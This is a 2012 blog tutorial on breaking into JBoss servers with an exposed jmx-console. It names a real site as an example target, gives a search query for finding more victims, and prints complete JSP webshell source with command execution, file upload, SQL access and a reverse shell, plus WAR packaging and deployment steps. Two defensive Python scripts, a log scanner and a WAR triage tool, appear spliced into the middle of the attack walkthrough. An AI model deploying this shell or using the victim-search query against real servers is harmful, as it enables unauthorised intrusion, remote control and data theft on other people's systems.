
Friday, 25 May 2012

Jboss exploitation



This is a simple tutorial for exploiting a JBoss server whose jmx-console directory is accessible to the public, for example this site --> http://epostrx.net/jmx-console/ ... other such sites can be found through Google with the search:
Code:
inurl:"jmx-console/HtmlAdaptor"

Requirement:

1. Ubuntu 10.10 ;D
2. Java Development Kit (JDK) from Sun. Steps to install it on Ubuntu --> http://playingwithsid.blogspot.com/2010/...-1010.html
3. A shell written in JSP. You need shell.jsp, a WEB-INF folder and web.xml. The web.xml file goes inside the WEB-INF folder.





Contents of shell.jsp
Code:
<%@page contentType="text/html"%>
<%@page language="java" %>
<%@page import="java.util.*,java.io.*,java.sql.*,java.security.*,java.net.*,java.lang.*"%>
<%
/*

TODO: add connectors for more databases
*/
// authentication from kidz
String checkUser = "tbd";
String checkPass = "4f78625cd2d2251472af996a2ba1f7cc";
// MySql database port
String dbPort = "3306";                    // port (usually 3306)
// Dont touch the rest!
%>
<html><body>
<%
String myUser = request.getParameter("myUser");
String myPass = request.getParameter("myPass");
String dbH = request.getParameter("dbHost");
String dbN = request.getParameter("dbName");
String dbU = request.getParameter("dbUser");
String dbP = request.getParameter("dbPass");
String ipAddress = request.getParameter("ipaddress");
String ipPort = request.getParameter("port");
String contentType = request.getContentType();
Connection conn = null;
Statement statement = null;
ResultSet rs = null;

%>
<%!
// form factory to make all my forms
public String formFactory(int formType, String myMessage){
    String form = null;
    if (formType == 1){
        form = "<p>"+myMessage+"</p>" +
        "<form method=\"POST\" action=\"\">" +
        "<textarea rows=\"5\" cols=\"55\" wrap=\"off\" name=\"qry\">" +
        "Enter SQL here" +
        "</textarea>" +
        "<p><input type=\"submit\" value=\"Execute SQL\"></p>" +
        "</form><hr>";
    }
    else if (formType == 2){
        form = "<h2>Access prohibited!! <span style=\"font-size: small;\">" +
        "if you dont know the pass GTFO</span></h2>"+myMessage+"<br>" +
        "<form method=\"POST\" action=\"\">" +
        "<table>" +
        "<tr><td><b>Username: </b></td>" +
        "<td><input type=\"text\" name=\"myUser\" size=\"10\"></td></tr>" +
        "<tr><td><b>Password: </b></td>" +
        "<td><input type=\"password\" name=\"myPass\" size=\"20\"></td></tr>" +
        "</table>"+
        "<p><input type=\"submit\" value=\"Submit\"></p>" +
        "</form>";
    }
    else if (formType == 3){
        form = "<p>"+myMessage+"</p>" +
        "<form method=\"POST\" action=\"\">" +
        "<table>" +
        "<tr><td><b>Database name: </b></td>" +
        "<td><input type=\"text\" name=\"dbName\" size=\"20\"></td></tr>" +
        "<tr><td><b>Database host: </b></td>" +
        "<td><input type=\"text\" name=\"dbHost\" size=\"20\"></td></tr>" +
        "<tr><td><b>Database user: </b></td>" +
        "<td><input type=\"text\" name=\"dbUser\" size=\"20\"></td></tr>" +
        "<tr><td><b>Database pass: </b></td>" +
        "<td><input type=\"password\" name=\"dbPass\" size=\"20\"></td></tr>" +
        "</table>"+
        "<p><input type=\"submit\" value=\"Submit\"></p>" +
        "</form><hr>";
    }
    else if (formType == 4){
        form = "<h2>Seekor kambing janggutnya lebat. <span style=\"font-size: small;\">" +
        "lol</span></h2>"+myMessage+"" +
        "<form method=\"POST\" action=\"\">" +
        "<table>" +
        "<tr><td><b>cmd: </b></td>" +
        "<td><input type=\"text\" name=\"cmd\"" +
        "value=\"Enter cmd here\"size=\"40\"></td></tr>" +
        "</table>"+
        "<p><input type=\"submit\" value=\"Submit\">" +
        "<input type=\"submit\" name=\"ciao\" value=\"logout\"></p>" +
        "</form>";
    }
    else if (formType == 5){
        form = "<form method=\"post\" ACTION=\"\" name=\"upform\""+    
        "ENCTYPE='multipart/form-data'>" +
        "<input type=\"file\" name=\"uploadfile\">" +
        "<input type=\"submit\" name=\"Submit\" value=\"Submit\">" +
        "<input type=\"reset\" name=\"Reset\" value=\"Reset\">" +
        "<input type=\"hidden\" name=\"action\" value=\"upload\">" +
        "</form>";
    }
    else if (formType == 6){
        form = "<form method=\"POST\"><b>IP Address: </b>" +
        "<input type=\"text\" name=\"ipaddress\" size=15><b> Port: </b>" +
        "<input type=\"text\" name=\"port\" size=5>" +
        "<input type=\"submit\" name=\"Connect\" value=\"Connect back\">" +
        "</form>";
    }
    return form;
}
// md5 routine from Jonathan Snook (snook.ca)
public String getMd5(String plainText){
    try{
        MessageDigest mdAlgorithm = MessageDigest.getInstance("MD5");
        mdAlgorithm.update(plainText.getBytes());
        byte[] digest = mdAlgorithm.digest();
        StringBuffer hexString = new StringBuffer();
        for (int i = 0; i < digest.length; i++) {
                plainText = Integer.toHexString(0xFF & digest[i]);
            if (plainText.length() < 2) {
                    plainText = "0" + plainText;
                }
                hexString.append(plainText);
        }
        return (hexString.toString());
    }
    catch(NoSuchAlgorithmException e) { return(null); }
}

// reverse shell class from Tan Chew Keong (http://www.security.org.sg/code/jspreverse.html)
static class StreamConnector extends Thread
{
        InputStream is;
        OutputStream os;
        StreamConnector(InputStream is, OutputStream os)
        {
                this.is = is;
                this.os = os;
        }
        public void run()
        {
                BufferedReader isr = null;
                BufferedWriter osw = null;
                try
                {
                        isr = new BufferedReader(new InputStreamReader(is));
                        osw = new BufferedWriter(new OutputStreamWriter(os));
                        char buffer[] = new char[8192];
                        int lenRead;
                        while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0)
                        {
                                osw.write(buffer, 0, lenRead);
                                osw.flush();
                        }
                }
                catch (Exception ioe){}
                try
                {
                        if(isr != null) isr.close();
                        if(osw != null) osw.close();
                }
                catch (Exception ioe){}
        }
}

%>
<pre>
<%
String checkSes = (String)session.getAttribute("admin");
String dbSet = (String)session.getAttribute("dbSet");
if (checkUser.equals(myUser) && checkPass.equals(getMd5(myPass)) || checkSes == "yes"){
    // we are god mode
    session.setAttribute("admin","yes");
    if (request.getParameter("qry") != null) {
        out.println(formFactory(4, ""));
        out.println(formFactory(6, ""));
        out.println(formFactory(5, ""));
        String sqlForm = formFactory(1, "<br><i>Enter your SQL syntax</i>");
        String ModdedSqlForm = sqlForm.replace("Enter SQL here",request.getParameter("qry"));
        out.println(ModdedSqlForm);
        // who needs connection pools ;)
        Class.forName("com.mysql.jdbc.Driver").newInstance();
        String dbUser = (String)session.getAttribute("dbUser");
        String dbPass = (String)session.getAttribute("dbPass");
        String dbHost = (String)session.getAttribute("dbHost");
        String dbName = (String)session.getAttribute("dbName");
        String connectionURL = "jdbc:mysql://"+dbHost+":"+dbPort+"/"+dbName+"?";
        // Connect to MySql with our correct details
        try{
            conn = DriverManager.getConnection(connectionURL,dbUser,dbPass);
            statement = conn.createStatement();
            rs = statement.executeQuery(request.getParameter("qry"));
            ResultSetMetaData rsMetaData = rs.getMetaData();
            int numberOfColumns = rsMetaData.getColumnCount();
            // while there are rows in the result set
            while (rs.next()) {
            out.println("<p>");
                // for every column in every row
                for (int i = 1; i < numberOfColumns + 1; i++) {
                          String columnName = rsMetaData.getColumnName(i);
                          out.println("<b>"+columnName + "</b> : " + rs.getString(i));
                    }
            }
            out.println("</p>");
            rs.close();
            // safely close our sql connection
            if (conn != null) {
                try {
                    conn.close();
                } catch (SQLException sqle) {
                    sqle.printStackTrace();
                }
            }
        }
        catch(SQLException sqle){
            return;
        }
    }
    else if (request.getParameter("cmd") != null
            && request.getParameter("ciao") == null){
        String cmdShell = formFactory(4, "");
        String ModdedCmdShell = cmdShell.replace("Enter cmd here",request.getParameter("cmd"));
        out.println(ModdedCmdShell);
        out.println(formFactory(6, ""));
        out.println(formFactory(5, ""));
        if (dbU != null && dbP != null || dbSet == "yes"){
            session.setAttribute("dbSet","yes");
            session.setAttribute("dbHost",dbH);
            session.setAttribute("dbPass",dbP);
            session.setAttribute("dbName",dbN);
            session.setAttribute("dbUser",dbU);
            out.println(formFactory(1, "<br><i>Enter your SQL syntax:</i>"));
        }else{
            out.println(formFactory(3, "<br><i>Enter MySql details:</i>"));
        }
        // cmd shell from redteam-pentesting.de
        String cmd = request.getParameter("cmd");
        try{
            Process p = Runtime.getRuntime().exec(cmd);
            OutputStream os = p.getOutputStream();
            InputStream in = p.getInputStream();
            DataInputStream dis = new DataInputStream(in);
            String disr = dis.readLine();
            while ( disr != null ) {
                out.println(disr);
                disr = dis.readLine();
            }   
        }
        catch (IOException e){
            return;
        }       
    }
    // uploading our files
    else if ((contentType != null) && (contentType.indexOf("multipart/form-data") >= 0)) {
        DataInputStream in = new DataInputStream(request.getInputStream());
        int formDataLength = request.getContentLength();
        byte dataBytes[] = new byte[formDataLength];
        int byteRead = 0;
        int totalBytesRead = 0;
        while (totalBytesRead < formDataLength) {
            byteRead = in.read(dataBytes, totalBytesRead, formDataLength);
            totalBytesRead += byteRead;
        }
        String file = new String(dataBytes);
        String saveFile = file.substring(file.indexOf("filename=\"") + 10);
        saveFile = saveFile.substring(0, saveFile.indexOf("\n"));
        saveFile = saveFile.substring(saveFile.lastIndexOf("\\") +     1,saveFile.indexOf("\""));
        int lastIndex = contentType.lastIndexOf("=");
        String boundary = contentType.substring(lastIndex + 1,contentType.length());
        int pos = file.indexOf("filename=\"");
        pos = file.indexOf("\n", pos) + 1;
        pos = file.indexOf("\n", pos) + 1;
        pos = file.indexOf("\n", pos) + 1;   
        int boundaryLocation = file.indexOf(boundary, pos) - 4;
        int startPos = ((file.substring(0, pos)).getBytes()).length;
        int endPos = ((file.substring(0, boundaryLocation)).getBytes()).length;
        FileOutputStream fileOut = new FileOutputStream(saveFile);
        fileOut.write(dataBytes, startPos, (endPos - startPos));
        fileOut.flush();
        fileOut.close();
        response.setHeader("Refresh", "0");
    }

    // reverse shell
    else if(ipAddress != null && ipPort != null){
        Socket sock = null;
            try{
                    sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());
                    Runtime rt = Runtime.getRuntime();
            Process proc = rt.exec("/bin/sh");
                    StreamConnector outputConnector =
                            new StreamConnector(proc.getInputStream(),
                                    sock.getOutputStream());
                    StreamConnector inputConnector =
                            new StreamConnector(sock.getInputStream(),
                                   proc.getOutputStream());
                    outputConnector.start();
                    inputConnector.start();
            }
            catch(Exception e) {}
        response.setHeader("Refresh", "0");
    }

    // logout
    else if (request.getParameter("ciao") != null){
        session.invalidate();
        response.setHeader("Refresh", "0");
    }
    else{
        out.println(formFactory(4, ""));
        out.println(formFactory(6, ""));
        out.println(formFactory(5, ""));
        // check too see if database credz have been set
        if (dbU != null && dbP != null || dbSet == "yes"){
            session.setAttribute("dbHost",dbH);
            session.setAttribute("dbPass",dbP);
            session.setAttribute("dbName",dbN);
            session.setAttribute("dbUser",dbU);
            // test the credentials
            try{
                String connectionURL = "jdbc:mysql://"+dbH+":"+dbPort+"/"+dbN+"?";
                conn = DriverManager.getConnection(connectionURL,dbU,dbP);
                session.setAttribute("dbSet","yes");
                //out.print("session set, doh!");
            }
            catch(SQLException sqle){
                out.println(formFactory(3, "<br><b>" +
                    "Credentials failed! </b><i>Enter MySql details:</i>"));
                return;
            }
            conn.close();
            out.println(formFactory(1, "<br><i>Enter your SQL syntax:</i>"));
        }else{
            out.println(formFactory(3, "<br><i>Enter MySql details:</i>"));
        }
    }
}
// if the username and password is incorrect
else if (myUser != null || myPass != null){
    session.setAttribute("admin","no");
    out.println(formFactory(2, "<br><b>username or password incorrect!</b>"));
}
// we just loaded the page for the first time
else{
    session.setAttribute("admin","no");
    out.println(formFactory(2, ""));
}
%>
</pre>
</body></html>

Credit goes to mr_me for the shell.

In the shell.jsp file there are a few lines whose configuration you can change:
First:
Code:
Process proc = rt.exec("/bin/sh");
Change the line above to match the site you are exploiting: if the site's operating system is Linux-based, use rt.exec("/bin/sh"); if it is Windows, use rt.exec("cmd.exe");

To find out which OS the site runs, look at http://sitetu.com/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system%3Atype%3DServerInfo
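From the defender's side, the two URL shapes quoted in this post (the public jmx-console directory at the top, and the ServerInfo inspection just above) are exactly what to look for in web server logs. The script below is an added example, not part of the original post: it parses NCSA/Apache combined-format access log lines (an assumption; adapt the regex to your JBoss/front-end log format), flags any request that touches /jmx-console, labels the ServerInfo fingerprinting request, and treats a POST to HtmlAdaptor as an MBean invocation worth reviewing. The log lines are constructed sample data.

```python
"""Flag JBoss jmx-console activity in an HTTP access log (added example).

Assumptions (not from the original post): NCSA combined log format, and
the /jmx-console/HtmlAdaptor URL shapes quoted in the post. SAMPLE_LOG is
constructed sample data, not real traffic.
"""
import re
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample: one client browses the console, fingerprints the
# server's OS via the ServerInfo MBean, then POSTs to HtmlAdaptor.
SAMPLE_LOG = """\
203.0.113.7 - - [25/May/2012:10:01:02 +0800] "GET /index.html HTTP/1.1" 200 512
203.0.113.7 - - [25/May/2012:10:01:09 +0800] "GET /jmx-console/ HTTP/1.1" 200 7311
203.0.113.7 - - [25/May/2012:10:01:15 +0800] "GET /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system%3Atype%3DServerInfo HTTP/1.1" 200 4090
203.0.113.7 - - [25/May/2012:10:02:40 +0800] "POST /jmx-console/HtmlAdaptor HTTP/1.1" 200 1030
198.51.100.4 - - [25/May/2012:10:03:01 +0800] "GET /images/logo.png HTTP/1.1" 200 2210
"""


def classify(method, path):
    """Return a finding label for one request, or None if it is not console traffic."""
    parts = urlsplit(path)
    if not parts.path.startswith("/jmx-console"):
        return None
    if not parts.path.endswith("/HtmlAdaptor"):
        # Any hit on the console itself means it is reachable from this client.
        return "jmx-console reachable"
    if method == "POST":
        # HtmlAdaptor POSTs carry MBean operation invocations (the deploy path).
        return "HtmlAdaptor POST (MBean invocation)"
    qs = parse_qs(parts.query)          # parse_qs percent-decodes values
    action = qs.get("action", [""])[0]
    name = qs.get("name", [""])[0]
    if action == "inspectMBean" and "type=ServerInfo" in name:
        return "ServerInfo recon (OS fingerprinting)"
    if action:
        return "HtmlAdaptor action=" + action
    return "HtmlAdaptor request"


def scan_log(text):
    """Parse every line and return a list of findings as dicts."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                    # skip lines that do not fit the format
        label = classify(m["method"], m["path"])
        if label:
            findings.append({"ip": m["ip"], "ts": m["ts"],
                             "path": m["path"], "label": label})
    return findings


def by_ip(findings):
    """Group finding labels per client address, preserving order."""
    grouped = {}
    for f in findings:
        grouped.setdefault(f["ip"], []).append(f["label"])
    return grouped


if __name__ == "__main__":
    for ip, labels in by_ip(scan_log(SAMPLE_LOG)).items():
        print(ip)
        for label in labels:
            print("  -", label)
```

A single client that fingerprints ServerInfo and then POSTs to HtmlAdaptor within minutes is the sequence to alert on; the real fix is to stop the console being reachable anonymously at all.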

Second:
Code:
String checkUser = "tbd";
String checkPass = "4f78625cd2d2251472af996a2ba1f7cc";

This shell has a password. By default the username/password is tbd/kambing. The password is stored as an MD5 hash.

Contents of web.xml:
Code:
<?xml version="1.0" ?>
<web-app xmlns="http://java.sun.com/xml/ns/j2ee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee
                             http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"
         version="2.4">
  <servlet>
    <servlet-name>Command</servlet-name>
    <jsp-file>/shell.jsp</jsp-file>
  </servlet>
</web-app>

The web.xml file is placed inside the WEB-INF folder.

4. Somewhere to host your WAR file. The shell.jsp file, the WEB-INF folder and web.xml are packed together into a single WAR file. I just use project hosting on code.google.com to host my WAR file.
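Because the whole payload travels as one WAR, an incident responder can triage a deployed archive offline. The script below is an added example, not part of the original post: it opens a WAR with the standard library, scans the JSP and XML members for the traits the shell above exhibits (Runtime.exec, an outbound Socket, a cmd request parameter, FileOutputStream writes, JDBC from request data, and a web.xml that maps a servlet straight to a JSP file), and reports which members hit. The sample WAR it builds in memory is constructed for the demonstration; point scan_war() at a real .war path to use it on a server's deploy directory.

```python
"""Triage a WAR for webshell traits (added example, not the post's code).

Assumptions: the indicator patterns are derived from the shell shown in the
post; build_sample_war() creates a constructed fixture, not a real payload.
"""
import io
import re
import zipfile

INDICATORS = {
    "os command execution": re.compile(r"Runtime\.getRuntime\(\)\.exec\("),
    "outbound socket (reverse shell)": re.compile(r"new\s+Socket\("),
    "command taken from request": re.compile(r'getParameter\("cmd"\)'),
    "writes request bytes to disk": re.compile(r"new\s+FileOutputStream\("),
    "JDBC connection from request data": re.compile(r"DriverManager\.getConnection\("),
}

SCANNED_SUFFIXES = (".jsp", ".jspx", ".java", ".xml")


def scan_source(text):
    """Return the indicator names that match one source file."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def scan_war(war):
    """Return {member: [indicators]} for every member with at least one hit.

    `war` may be a filesystem path or the archive's bytes.
    """
    source = io.BytesIO(war) if isinstance(war, (bytes, bytearray)) else war
    hits = {}
    with zipfile.ZipFile(source) as zf:
        for info in zf.infolist():
            if info.is_dir() or not info.filename.lower().endswith(SCANNED_SUFFIXES):
                continue
            text = zf.read(info.filename).decode("utf-8", "replace")
            found = scan_source(text)
            # A web.xml that routes a servlet name to a .jsp is the packaging
            # trick used above; legitimate apps rarely need it.
            if info.filename.endswith("web.xml") and "<jsp-file>" in text:
                found.append("web.xml maps a servlet to a JSP")
            if found:
                hits[info.filename] = found
    return hits


# Constructed fixture: just enough text to exercise the indicators.
SAMPLE_JSP = """<%@page import="java.io.*,java.net.*"%>
<% String cmd = request.getParameter("cmd");
   Process p = Runtime.getRuntime().exec(cmd);
   Socket s = new Socket(request.getParameter("ipaddress"), 4444); %>
"""
SAMPLE_WEB_XML = """<web-app version="2.4">
  <servlet><servlet-name>Command</servlet-name><jsp-file>/shell.jsp</jsp-file></servlet>
</web-app>
"""


def build_sample_war():
    """Assemble an in-memory WAR mirroring the layout described in the post."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("shell.jsp", SAMPLE_JSP)
        zf.writestr("WEB-INF/web.xml", SAMPLE_WEB_XML)
        zf.writestr("index.jsp", "<html><body>hello</body></html>")
    return buf.getvalue()


if __name__ == "__main__":
    for member, found in scan_war(build_sample_war()).items():
        print(member)
        for name in found:
            print("  -", name)
```

Run it across every .war (and every exploded directory zipped up) under the JBoss deploy path after an incident; a JSP that both executes commands and opens an outbound socket has no business in a normal application.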

How to create the WAR file and exploit the JBoss vuln is shown in the video..

Video file:
Code:
http://www.mediafire.com/?zyjvfwdtxch77yu

That's all.. Enjoy!

Notes:
The method shown in the video is the easiest one and assumes the most ideal situation. There are servers on which this method does not work because the server sits behind a firewall that does not allow outbound HTTP connections. To dig deeper into JBoss exploitation, refer to the following papers:

1. http://www.redteam-pentesting.de/publica...ing_EN.pdf
2. http://www.nruns.com/_downloads/Whitepap...rowser.pdf
3. http://www.redteam-pentesting.de/publica...-MBean.pdf
4. https://www.trustwave.com/downloads/spid...nasiou.pdf
